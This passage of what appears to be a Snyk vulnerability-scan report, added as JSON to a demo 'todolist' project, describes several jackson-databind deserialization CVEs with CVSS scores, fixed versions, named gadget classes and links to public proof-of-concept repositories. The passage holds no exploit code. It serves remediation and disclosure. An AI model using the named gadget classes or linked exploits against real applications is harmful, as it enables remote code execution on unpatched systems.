execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.6.7.4, 2.7.9.7, 2.8.11.5, 2.9.10.3 or higher.\n## References\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/914e7c9f2cb8ce66724bf26a72adc7e958992497)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2620)\n- [Jackson PoC](https://github.com/jas502n/jackson-CVE-2020-8840)\n- [PoC](https://github.com/jas502n/CVE-2020-8840)\n- [PoC](https://github.com/Veraxy01/CVE-2020-8840)\n", + "epssDetails": { + "percentile": "0.91001", + "probability": "0.03042", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2020-8840" + ], + "CWE": [ + "CWE-502" + ] + }, + "packageName": "com.fasterxml.jackson.core:jackson-databind", + "proprietary": false, + "creationTime": "2020-02-11T07:57:04.144993Z", + "functions_new": [ + { + "version": [ + "[,2.8.11.5)", + "[2.9.0,2.9.10.3)" + ], + "functionId": { + "className": "com.fasterxml.jackson.databind.ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2020-02-09T21:12:38Z", + "exploitDetails": { + "sources": [ + "Snyk" + ], + "maturityLevels": [ + { + "type": "secondary", + "level": "Proof of Concept", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Proof of Concept", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "com.fasterxml.jackson.core", + "artifactId": "jackson-databind" + }, + "publicationTime": "2020-02-11T21:12:38Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:51:13.031834Z", + "socialTrendAlert": false, + "packagePopularityRank": 99, + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "com.fasterxml.jackson.core:jackson-databind@2.6.5" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "isPinnable": false, + "isRuntime": false, + "name": "com.fasterxml.jackson.core:jackson-databind", + "version": "2.6.5", + "severityWithCritical": "high" + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-559094", + "title": "Deserialization of Untrusted Data", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:P/RL:O/RC:C", + "credit": [ + "Unknown" + ], + "semver": { + "vulnerable": [ + "[,2.6.7.4)", + "[2.7.0,2.7.9.7)", + "[2.8.0,2.8.11.6)", + "[2.9.0,2.9.10.4)" + ] + }, + "exploit": "Proof of Concept", + "fixedIn": [ + "2.6.7.4", + "2.7.9.7", + "2.8.11.6", + "2.9.10.4" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 8.1, + "functions": [ + { + "version": [ + "[,2.6.7.3)", + "[2.8.0,2.8.11.5)", + "[2.9.0,2.9.10.3)" + ], + "functionId": { + "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", + "className": "ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "com.fasterxml.jackson.core:jackson-databind", + "references": [ + { + "url": "https://github.com/FasterXML/jackson-databind/commit/9f4e97019fb0dd836533d0b6198c88787e235ae2", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/FasterXML/jackson-databind/issues/2634", + "title": "Github Issue #1" + }, + { + "url": "https://github.com/FasterXML/jackson-databind/issues/2631", + "title": "GitHub Issue #2" + }, + { + "url": "https://github.com/fairyming/CVE-2020-9548", + "title": "GitHub PoC" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "critical", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 9.8, + "modificationTime": "2024-03-11T09:51:19.015843Z" + }, + { + "assigner": "Red Hat", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.1, + "modificationTime": "2024-03-11T09:53:54.132894Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:P/RL:O/RC:C", + "assigner": "Snyk", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:58:59.016713Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "critical", + "baseScore": 9.8, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:51:19.015843Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "Red Hat", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:53:54.132894Z" + } + ], + "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. Mishandles the interaction between serialization gadgets and typing, related to:\r\n\r\n* `com.ibatis.sqlmap.engine.transaction.jta.JtaTransactionConfig` (aka `ibatis-sqlmap`)\r\n* `br.com.anteros.dbcp.AnterosDBCPConfig` (aka `anteros-core`)\r\n* `org.apache.hadoop.shaded.com.zaxxer.hikari.HikariConfig` (aka shaded `hikari-config`)\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.6.7.4, 2.7.9.7, 2.8.11.6, 2.9.10.4 or higher.\n## References\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/9f4e97019fb0dd836533d0b6198c88787e235ae2)\n- [Github Issue #1](https://github.com/FasterXML/jackson-databind/issues/2634)\n- [GitHub Issue #2](https://github.com/FasterXML/jackson-databind/issues/2631)\n- [GitHub PoC](https://github.com/fairyming/CVE-2020-9548)\n", + "epssDetails": { + "percentile": "0.79604", + "probability": "0.00652", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2020-9546", + "CVE-2020-9547", + "CVE-2020-9548" + ], + "CWE": [ + "CWE-502" + ], + "GHSA": [ + "GHSA-5p34-5m6p-p58g", + "GHSA-p43x-xfjf-5jhr", + "GHSA-q93h-jc49-78gg" + ] + }, + "packageName": "com.fasterxml.jackson.core:jackson-databind", + "proprietary": false, + "creationTime": "2020-03-02T10:29:31.222015Z", + "functions_new": [ + { + "version": [ + "[,2.6.7.3)", + "[2.8.0,2.8.11.5)", + "[2.9.0,2.9.10.3)" + ], + "functionId": { + "className": "com.fasterxml.jackson.databind.ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2020-03-02T05:18:36Z", + "exploitDetails": { + "sources": [ + "Snyk" + ], + "maturityLevels": [ + { + "type": "secondary", + "level": "Proof of Concept", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Proof of Concept", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "com.fasterxml.jackson.core", + "artifactId": "jackson-databind" + }, + "publicationTime": "2020-03-02T05:18:36Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:53:54.132894Z", + "socialTrendAlert": false, + "packagePopularityRank": 99, + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "com.fasterxml.jackson.core:jackson-databind@2.6.5" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "isPinnable": false, + "isRuntime": false, + "name": "com.fasterxml.jackson.core:jackson-databind", + "version": "2.6.5", + "severityWithCritical": "high" + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-559106", + "title": "Deserialization of Untrusted Data", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:P/RL:O/RC:C", + "credit": [ + "Pedro Sampaio" + ], + "semver": { + "vulnerable": [ + "[,2.6.7.3)", + "[2.8.0,2.8.11.5)", + "[2.9.0,2.9.10.3)" + ] + }, + "exploit": "Proof of Concept", + "fixedIn": [ + "2.6.7.3", + "2.8.11.5", + "2.9.10.3" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 8.1, + "functions": [ + { + "version": [ + "[,2.6.7.3)", + "[2.8.0,2.8.11.5)", + "[2.9.0,2.9.10.3)" + ], + "functionId": { + "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", + "className": "ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "com.fasterxml.jackson.core:jackson-databind", + "references": [ + { + "url": "https://github.com/FasterXML/jackson-databind/commit/41b7f9b90149e9d44a65a8261a8deedc7186f6af", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/FasterXML/jackson-databind/issues/2462", + "title": "GitHub Issue" + }, + { + "url": "https://github.com/FasterXML/jackson-databind/issues/2469", + "title": "GitHub Issue" + }, + { + "url": "https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2019-14892", + "title": "RedHat Bugzilla" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "critical", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 9.8, + "modificationTime": "2024-03-11T09:47:48.813035Z" + }, + { + "assigner": "Red Hat", + "severity": "high", + "cvssV3Vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", + "cvssV3BaseScore": 7.5, + "modificationTime": "2024-03-11T09:53:54.500842Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:P/RL:O/RC:C", + "assigner": "Snyk", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:58:59.772859Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "critical", + "baseScore": 9.8, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:47:48.813035Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", + "assigner": "Red Hat", + "severity": "high", + "baseScore": 7.5, + "cvssVersion": "3.0", + "modificationTime": "2024-03-11T09:53:54.500842Z" + } + ], + "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data due to an incomplete black list (incomplete fix for [CVE-2017-7525](https://snyk.io/vuln/SNYK-JAVA-COMFASTERXMLJACKSONCORE-31507)). \r\nIt doesn't block `common-configuration` JNDI classes `org.apache.commons.configuration.JNDIConfiguration` and `org.apache.commons.configuration2.JNDIConfiguration`.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.6.7.3, 2.8.11.5, 2.9.10.3 or higher.\n## References\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/41b7f9b90149e9d44a65a8261a8deedc7186f6af)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2462)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2469)\n- [RedHat Bugzilla](https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2019-14892)\n", + "epssDetails": { + "percentile": "0.73523", + "probability": "0.00392", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2019-14892", + "CVE-2019-14893" + ], + "CWE": [ + "CWE-502" + ], + "GHSA": [ + "GHSA-cf6r-3wgc-h863", + "GHSA-qmqc-x3r4-6v39" + ] + }, + "packageName": "com.fasterxml.jackson.core:jackson-databind", + "proprietary": false, + "creationTime": "2020-03-03T08:13:33.357434Z", + "functions_new": [ + { + "version": [ + "[,2.6.7.3)", + "[2.8.0,2.8.11.5)", + "[2.9.0,2.9.10.3)" + ], + "functionId": { + "className": "com.fasterxml.jackson.databind.ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2020-03-02T17:09:34Z", + "exploitDetails": { + "sources": [ + "Snyk" + ], + "maturityLevels": [ + { + "type": "secondary", + "level": "Proof of Concept", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Proof of Concept", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "com.fasterxml.jackson.core", + "artifactId": "jackson-databind" + }, + "publicationTime": "2020-03-02T17:09:34Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:53:54.500842Z", + "socialTrendAlert": false, + "packagePopularityRank": 99, + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "com.fasterxml.jackson.core:jackson-databind@2.6.5" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "isPinnable": false, + "isRuntime": false, + "name": "com.fasterxml.jackson.core:jackson-databind", + "version": "2.6.5", + "severityWithCritical": "high" + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-560762", + "title": "Deserialization of Untrusted Data", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:P/RL:U/RC:C", + "credit": [ + "Unknown" + ], + "semver": { + "vulnerable": [ + "[2.0.0,2.6.7.4)", + "[2.7.0,2.9.10.4)" + ] + }, + "exploit": "Proof of Concept", + "fixedIn": [ + "2.6.7.4", + "2.9.10.4" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 8.1, + "functions": [ + { + "version": [ + "[2.0.0,2.9.10.4)" + ], + "functionId": { + "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", + "className": "ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "com.fasterxml.jackson.core:jackson-databind", + "references": [ + { + "url": "https://github.com/FasterXML/jackson-databind/commit/1645efbd392989cf015f459a91c999e59c921b15", + "title": "GitHub Commit (Master)" + }, + { + "url": "https://github.com/FasterXML/jackson-databind/issues/2660", + "title": "GitHub Issue" + }, + { + "url": "https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062", + "title": "On Jackson CVE's Blog" + }, + { + "url": "https://github.com/Al1ex/CVE-2020-10673", + "title": "PoC" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.8, + "modificationTime": "2024-03-11T09:50:14.029596Z" + }, + { + "assigner": "Red Hat", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.1, + "modificationTime": "2024-03-11T09:53:50.167932Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:P/RL:U/RC:C", + "assigner": "Snyk", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:58:45.907430Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "high", + "baseScore": 8.8, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:50:14.029596Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "Red Hat", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:53:50.167932Z" + } + ], + "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. The package mishandles the interaction between serialization gadgets and typing, related to `com.caucho.config.types.ResourceRef` (aka `caucho-quercus`).\r\n\r\n\r\nNote: This vulnerability does not affect release `2.10.0` onward.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.6.7.4, 2.9.10.4 or higher.\n## References\n- [GitHub Commit (Master)](https://github.com/FasterXML/jackson-databind/commit/1645efbd392989cf015f459a91c999e59c921b15)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2660)\n- [On Jackson CVE's Blog](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n- [PoC](https://github.com/Al1ex/CVE-2020-10673)\n", + "epssDetails": { + "percentile": "0.81511", + "probability": "0.00775", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2020-10673" + ], + "CWE": [ + "CWE-502" + ], + "GHSA": [ + "GHSA-fqwf-pjwf-7vqv" + ] + }, + "packageName": "com.fasterxml.jackson.core:jackson-databind", + "proprietary": false, + "creationTime": "2020-03-19T14:36:02.644920Z", + "functions_new": [ + { + "version": [ + "[2.0.0,2.9.10.4)" + ], + "functionId": { + "className": "com.fasterxml.jackson.databind.ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2020-03-18T22:56:21Z", + "exploitDetails": { + "sources": [ + "Snyk" + ], + "maturityLevels": [ + { + "type": "secondary", + "level": "Proof of Concept", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Proof of Concept", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "com.fasterxml.jackson.core", + "artifactId": "jackson-databind" + }, + "publicationTime": "2020-03-18T22:56:21Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:53:50.167932Z", + "socialTrendAlert": false, + "packagePopularityRank": 99, + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "com.fasterxml.jackson.core:jackson-databind@2.6.5" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "isPinnable": false, + "isRuntime": false, + "name": "com.fasterxml.jackson.core:jackson-databind", + "version": "2.6.5", + "severityWithCritical": "high" + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-560766", + "title": "Deserialization of Untrusted Data", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", + "credit": [ + "Unknown" + ], + "semver": { + "vulnerable": [ + "[2.0.0,2.6.7.4)", + "[2.7.0,2.9.10.4)" + ] + }, + "exploit": "Unproven", + "fixedIn": [ + "2.6.7.4", + "2.9.10.4" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 8.1, + "functions": [ + { + "version": [ + "[2.0.0,2.9.10.4)" + ], + "functionId": { + "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", + "className": "ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "com.fasterxml.jackson.core:jackson-databind", + "references": [ + { + "url": "https://github.com/FasterXML/jackson-databind/commit/592872f4235c7f2a3280725278da55544032f72d", + "title": "GitHub Commit (Master)" + }, + { + "url": "https://github.com/FasterXML/jackson-databind/issues/2659", + "title": "GitHub Issue" + }, + { + "url": "https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062", + "title": "On Jackson CVEs: Don’t Panic" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.8, + "modificationTime": "2024-03-11T09:51:25.975313Z" + }, + { + "assigner": "Red Hat", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.1, + "modificationTime": "2024-03-11T09:53:53.920721Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", + "assigner": "Snyk", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:56:35.299190Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "high", + "baseScore": 8.8, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:51:25.975313Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "Red Hat", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:53:53.920721Z" + } + ], + "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. The package mishandles the interaction between serialization gadgets and typing, related to `org.apache.aries.transaction.jms.internal.XaPooledConnectionFactory` (aka `aries.transaction.jms`). \r\n\r\nNote: This vulnerability does not affect release `2.10.0` onward.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct 